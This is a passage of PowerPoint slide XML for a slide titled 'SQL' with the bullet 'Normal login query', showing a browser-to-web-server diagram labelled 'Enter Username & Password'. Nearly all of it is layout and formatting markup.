                      <a:prstDash val="solid"/>
                    </a:lnT>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="9525">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="9525">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="9525">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="9525">
                      <a:solidFill>
                        <a:srgbClr val="40458C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="ECD882"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9401A41-C15E-B84B-9835-6525627EBD3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26F1D7D7-AE29-3347-8554-3934F50CCB4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normal login query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AFE5D15-EDF0-8A40-8A8D-AC80151B9140}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3577880" y="2317750"/>
            <a:ext cx="1275080" cy="2406650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="222250" marR="214629" indent="128270">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1475"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Web  Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66ED8900-8032-B14D-9BC8-23CF573A617A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="923580" y="2317750"/>
            <a:ext cx="1395730" cy="2406650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" rtlCol="0" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyP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pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="457200" algn="ctr" rtl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="914400" algn="ctr" rtl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1371600" algn="ctr" rtl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="1828800" algn="ctr" rtl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" kern="0" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="45"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" kern="0" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="168275" marR="160020" indent="-1270"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Web  Browser  (Client)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" kern="0" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D24B8CE-573D-4B4B-B96A-310A7A251E32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2299944" y="3497262"/>
            <a:ext cx="1241425" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1241425">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1241424" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E48B857-9337-6443-9BD1-6E06D8CA923A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3541369" y="3481529"/>
            <a:ext cx="43815" cy="31750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="43814" h="31750">
                <a:moveTo>
                  <a:pt x="0" y="31465"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43225" y="15732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="31465"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="40458C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2562DB0-78E1-BE42-9868-98229ADAF1B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3541369" y="3481529"/>
            <a:ext cx="43815" cy="31750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="43814" h="31750">
                <a:moveTo>
                  <a:pt x="0" y="31465"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="43225" y="15732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="31465"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B2CA0F4-44D8-FA4A-B991-9C0B06C3A726}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2390429" y="4506912"/>
            <a:ext cx="1123950" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1123950">
                <a:moveTo>
                  <a:pt x="1123949" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E55465E2-11C8-D042-B925-4EAB616E0943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2347203" y="4491179"/>
            <a:ext cx="43815" cy="31750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="43814" h="31750">
                <a:moveTo>
                  <a:pt x="43225" y="31465"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="15732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43225" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43225" y="31465"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="40458C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EF813B4-10CC-1D48-A1C4-FB64CE2BC329}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2347203" y="4491179"/>
            <a:ext cx="43815" cy="31750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="43814" h="31750">
                <a:moveTo>
                  <a:pt x="43225" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="15732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43225" y="31465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43225" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9039E1E-D827-B143-B064-D7BA0D2D81C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2358176" y="2308608"/>
            <a:ext cx="1182370" cy="1128395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="10795" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080" indent="635" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Enter  Username  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>&amp;      </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D6EB25C-6C9B-C648-9C0F-FE0627920C03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4852641" y="4127525"/>
            <a:ext cx="2982595" cy="1905"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2982595" h="1904">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2982249" y="1565"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D72CD56-FB97-1A42-8346-CA4057AB5A73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7820601" y="4114800"/>
            <a:ext cx="39370" cy="28575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="39370" h="28575">
                <a:moveTo>
                  <a:pt x="0" y="28564"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14289" y="14289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39247" y="14302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28564"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="40458C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBEABD2-E7E1-EE4A-A121-386E5A9D50A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7820601" y="4114800"/>
            <a:ext cx="39370" cy="28575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="39370" h="28575">
                <a:moveTo>
                  <a:pt x="14289" y="14289"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="28564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39247" y="14302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14289" y="14289"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC3E2D7-03E5-1745-80FB-4FBD256F31A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4871211" y="4275171"/>
            <a:ext cx="39370" cy="28575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="39370" h="28575">
                <a:moveTo>
                  <a:pt x="39232" y="28564"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="14262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39247" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24957" y="14274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39232" y="28564"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="40458C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98DA69A9-932F-4943-93DC-86265529A6EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4871211" y="4275171"/>
            <a:ext cx="39370" cy="28575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
